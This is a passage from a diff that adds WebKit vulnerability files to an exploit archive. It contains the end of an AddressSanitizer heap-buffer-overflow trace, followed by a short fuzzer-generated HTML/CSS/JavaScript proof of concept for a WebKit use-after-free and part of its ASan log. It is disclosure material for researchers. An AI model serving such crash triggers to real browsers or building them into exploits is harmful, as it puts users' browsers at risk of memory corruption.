+    #4 0x5139717c1 in WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39717c1)
+    #5 0x513849055 in WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3849055)
+    #6 0x5135cde84 in WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cde84)
+    #7 0x5135cf115 in WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cf115)
+    #8 0x5135cdb03 in WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cdb03)
+    #9 0x5137027fd in WebCore::RenderElement::paintAsInlineBlock(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37027fd)
+    #10 0x5135ce5da in WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool, WebCore::RenderBlock::PaintBlockType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35ce5da)
+    #11 0x51371d33e in WebCore::RenderFlexibleBox::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x371d33e)
+    #12 0x5135cdf8b in WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cdf8b)
+    #13 0x5135cf115 in WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cf115)
+    #14 0x5135cdb03 in WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cdb03)
+    #15 0x5137d9f68 in WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow, 16ul> const&, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d9f68)
+    #16 0x5137d6967 in WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow, 16ul> const&, WebCore::GraphicsContext&, WebCore::GraphicsContext&, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d6967)
+    #17 0x5137d0ef8 in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d0ef8)
+    #18 0x5137cdeb1 in WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37cdeb1)
+    #19 0x5137d65f9 in WebCore::RenderLayer::paintList(WTF::Vector<WebCore::RenderLayer*, 0ul, WTF::CrashOnOverflow, 16ul>*, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d65f9)
+    #20 0x5137d0fa2 in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d0fa2)
+    #21 0x5137cdeb1 in WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37cdeb1)
+    #22 0x5137d65f9 in WebCore::RenderLayer::paintList(WTF::Vector<WebCore::RenderLayer*, 0ul, WTF::CrashOnOverflow, 16ul>*, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d65f9)
+    #23 0x5137d0fa2 in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d0fa2)
+    #24 0x5137cdeb1 in WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37cdeb1)
+    #25 0x5137d65f9 in WebCore::RenderLayer::paintList(WTF::Vector<WebCore::RenderLayer*, 0ul, WTF::CrashOnOverflow, 16ul>*, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d65f9)
+    #26 0x5137d0fa2 in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d0fa2)
+    #27 0x513802488 in WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, WebCore::IntRect const&, unsigned int, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3802488)
+    #28 0x513802e36 in WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3802e36)
+    #29 0x5132583a8 in WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x32583a8)
+    #30 0x5132cfd80 in WebCore::GraphicsLayerCA::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x32cfd80)
+    #31 0x5109abcf8 in WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow, 16ul>&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9abcf8)
+    #32 0x513302a3a in WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3302a3a)
+    #33 0x510c52ca8 in -[WebSimpleLayer drawInContext:] (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc52ca8)
+    #34 0x7fff39bed5b5 in CABackingStoreUpdate_ (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x215b5)
+    #35 0x7fff39bed47e in invocation function for block in CA::Layer::display_() (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x2147e)
+    #36 0x7fff39becd05 in -[CALayer _display] (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x20d05)
+    #37 0x510c5294c in -[WebSimpleLayer display] (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc5294c)
+    #38 0x7fff39bdde4c in CA::Layer::display_if_needed(CA::Transaction*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x11e4c)
+    #39 0x7fff39bdd90a in CA::Layer::layout_and_display_if_needed(CA::Transaction*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x1190a)
+    #40 0x7fff39bdc8fb in CA::Context::commit_transaction(CA::Transaction*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x108fb)
+    #41 0x7fff39bdc494 in CA::Transaction::commit() (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x10494)
+    #42 0x7fff39be8959 in CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x1c959)
+    #43 0x7fff2e899466 in __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3466)
+    #44 0x7fff2e89938e in __CFRunLoopDoObservers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa338e)
+    #45 0x7fff2e87b1de in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851de)
+    #46 0x7fff2db61d95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
+    #47 0x7fff2db61b05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
+    #48 0x7fff2db61883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
+    #49 0x7fff2be13a72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
+    #50 0x7fff2c5a9e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
+    #51 0x7fff2be08884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
+    #52 0x7fff2bdd7a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
+    #53 0x7fff569e3dc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
+    #54 0x7fff569e2a19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
+    #55 0x10415d4c6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014c6)
+    #56 0x7fff56689014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)
+
+0x6020000b5b1f is located 6 bytes to the right of 9-byte region [0x6020000b5b10,0x6020000b5b19)
+allocated by thread T0 here:
+    #0 0x1083ada3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
+    #1 0x7fff568321bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
+    #2 0x51fa29734 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xef734)
+    #3 0x51fa25e3d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xebe3d)
+    #4 0x51f985a3b in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x4ba3b)
+    #5 0x51f984d8a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x4ad8a)
+    #6 0x51f9ed83c in WTF::StringBuffer<unsigned char>::StringBuffer(unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xb383c)
+    #7 0x51f9e2245 in WTF::Ref<WTF::StringImpl, WTF::DumbPtrTraits<WTF::StringImpl> > WTF::StringImpl::simplifyMatchedCharactersToSpace<unsigned char, bool (*)(unsigned short)>(bool (*)(unsigned short)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xa8245)
+    #8 0x51f9e213c in WTF::StringImpl::simplifyWhiteSpace(bool (*)(unsigned short)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xa813c)
+    #9 0x51fa1b046 in WTF::String::simplifyWhiteSpace(bool (*)(unsigned short)) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xe1046)
+    #10 0x51295133a in WebCore::HTMLOptionElement::displayLabel() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x295133a)
+    #11 0x512951772 in WebCore::HTMLOptionElement::textIndentedToRespectGroupLabel() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2951772)
+    #12 0x513882a9d in WebCore::RenderMenuList::setTextFromOption(int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3882a9d)
+    #13 0x51296c49e in WebCore::HTMLSelectElement::selectOption(int, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x296c49e)
+    #14 0x51294ef0c in WebCore::HTMLOptionElement::setSelected(bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294ef0c)
+    #15 0x510c05b3a in WebCore::setJSHTMLOptionElementSelectedSetter(JSC::ExecState&, WebCore::JSHTMLOptionElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc05b3a)
+    #16 0x510be8876 in bool WebCore::IDLAttribute<WebCore::JSHTMLOptionElement>::set<&(WebCore::setJSHTMLOptionElementSelectedSetter(JSC::ExecState&, WebCore::JSHTMLOptionElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, long long, long long, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xbe8876)
+    #17 0x521dc1978 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2487978)
+    #18 0x521dc1ab1 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2487ab1)
+    #19 0x521f65fd5 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x262bfd5)
+    #20 0x521a61fa1 in llint_slow_path_put_by_id (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2127fa1)
+    #21 0x51fa4932b in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10f32b)
+    #22 0x51fa4c9b8 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1129b8)
+    #23 0x51fa45fea in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10bfea)
+    #24 0x5217a5644 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e6b644)
+    #25 0x521d750d9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x243b0d9)
+    #26 0x521d7526b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x243b26b)
+    #27 0x521d75611 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x243b611)
+    #28 0x511e94868 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e94868)
+    #29 0x511ee240c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1ee240c)
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x42e77) in WTF::StringImpl::at(unsigned int) const
+Shadow bytes around the buggy address:
+  0x1c0400016b10: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa 00 00
+  0x1c0400016b20: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
+  0x1c0400016b30: fa fa fd fd fa fa 00 00 fa fa 00 00 fa fa 00 00
+  0x1c0400016b40: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
+  0x1c0400016b50: fa fa fd fd fa fa fd fd fa fa 00 00 fa fa 02 fc
+=>0x1c0400016b60: fa fa 00[01]fa fa fd fa fa fa 00 00 fa fa fd fa
+  0x1c0400016b70: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fa
+  0x1c0400016b80: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
+  0x1c0400016b90: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
+  0x1c0400016ba0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 00 00
+  0x1c0400016bb0: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fd
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==26550==ABORTING
+
+
+WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=187251
+Apple product security report ID: 694275579
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/45484.html b/exploits/multiple/dos/45484.html
new file mode 100644
index 000000000..d8b90366b
--- /dev/null
+++ b/exploits/multiple/dos/45484.html
@@ -0,0 +1,224 @@
+<!--
+There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of WebKit revision 233419 on OSX. The vulnerability has also been confirmed on Safari 11.1.1 sources grabbed from https://svn.webkit.org/repository/webkit/releases/Apple/Safari%2011.1.1/
+
+PoC:
+
+=================================================================
+-->
+
+<style id="s">
+#htmlvar00002, #htmlvar00006 { column-span: all; }
+:root { 1px; position: fixed; -webkit-column-width: 1px; }
+.class2 { text-indent: -webkit-shape-margin: 0px; -webkit-writing-mode: vertical-rl; '\.' }
+defs~element, .class8 { display: grid; 1s; }
+</style>
+<script>
+function jsfuzzer() {
+/* newvar{htmlvar00078:HTMLHRElement} */ htmlvar00078 = document.createElement("hr"); //HTMLHRElement
+try { s.appendChild(htmlvar00078); } catch(e) { }
+}
+</script>
+<body onload=jsfuzzer()>
+<details style="mso-data-placement: same-cell; content: url(#svgvar00005); framemargin="1">
+<summary id="htmlvar00002" ref="author">#>,TjEf3B0([{</summary>
+--r</details>
+<dt class="class8" multiple="multiple">
+<table class="class2" checked="checked">
+<caption icon=":x4Tt3j/oh%0&!;/C|">]C9C^]x:.</dt>
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==26534==ERROR: AddressSanitizer: heap-use-after-free on address 0x6130001038a0 at pc 0x0005781a70e3 bp 0x7ffeee6a5900 sp 0x7ffeee6a58f8
+READ of size 4 at 0x6130001038a0 thread T0
+==26534==WARNING: invalid path to external symbolizer!
+==26534==WARNING: Failed to use and restart external symbolizer!
+    #0 0x5781a70e2 in WebCore::LayoutUnit::rawValue() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1a70e2)
+    #1 0x5787adcd8 in WebCore::operator<(WebCore::LayoutUnit const&, WebCore::LayoutUnit const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7adcd8)
+    #2 0x57b88980f in WebCore::RenderMultiColumnSet::updateMinimumColumnHeight(WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x388980f)
+    #3 0x57b60a877 in WebCore::RenderBlockFlow::updateMinimumPageHeight(WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x360a877)
+    #4 0x57b6096d4 in WebCore::RenderBlockFlow::adjustLinePositionForPagination(WebCore::RootInlineBox*, WebCore::LayoutUnit&, bool&, WebCore::RenderFragmentedFlow*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36096d4)
+    #5 0x57b6521d0 in WebCore::RenderBlockFlow::layoutRunsAndFloatsInRange(WebCore::LineLayoutState&, WebCore::BidiResolverWithIsolate<WebCore::InlineIterator, WebCore::BidiRun, WebCore::BidiIsolatedRun>&, WebCore::InlineIterator const&, WebCore::BidiStatus const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36521d0)
+    #6 0x57b64fec7 in WebCore::RenderBlockFlow::layoutRunsAndFloats(WebCore::LineLayoutState&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x364fec7)
+    #7 0x57b656e9d in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3656e9d)
+    #8 0x57b5f6935 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35f6935)
+    #9 0x57b5c7772 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35c7772)
+    #10 0x57b8d6ac0 in WebCore::RenderTable::layoutCaption(WebCore::RenderTableCaption&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38d6ac0)
+    #11 0x57b8d6fb5 in WebCore::RenderTable::layoutCaptions(WebCore::RenderTable::BottomCaptionLayoutPhase) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38d6fb5)
+    #12 0x57b8d812f in WebCore::RenderTable::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38d812f)
+    #13 0x57b5593e2 in WebCore::GridTrackSizingAlgorithmStrategy::logicalHeightForChild(WebCore::RenderBox&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35593e2)
+    #14 0x57b555483 in WebCore::GridTrackSizingAlgorithmStrategy::minContentForChild(WebCore::RenderBox&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3555483)
+    #15 0x57b555a4a in WebCore::GridTrackSizingAlgorithmStrategy::minSizeForChild(WebCore::RenderBox&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3555a4a)
+    #16 0x57b554804 in WebCore::GridTrackSizingAlgorithm::sizeTrackToFitNonSpanningItem(WebCore::GridSpan const&, WebCore::RenderBox&, WebCore::GridTrack&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3554804)
+    #17 0x57b55d1c4 in WebCore::GridTrackSizingAlgorithm::resolveIntrinsicTrackSizes() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x355d1c4)
+    #18 0x57b563694 in WebCore::GridTrackSizingAlgorithm::run() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3563694)
+    #19 0x57b76f371 in WebCore::RenderGrid::computeTrackSizesForIndefiniteSize(WebCore::GridTrackSizingAlgorithm&, WebCore::GridTrackSizingDirection, WebCore::Grid&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x376f371)
+    #20 0x57b7703a0 in WebCore::RenderGrid::computeIntrinsicLogicalWidths(WebCore::LayoutUnit&, WebCore::LayoutUnit&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37703a0)
+    #21 0x57b5def8e in WebCore::RenderBlock::computePreferredLogicalWidths() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35def8e)
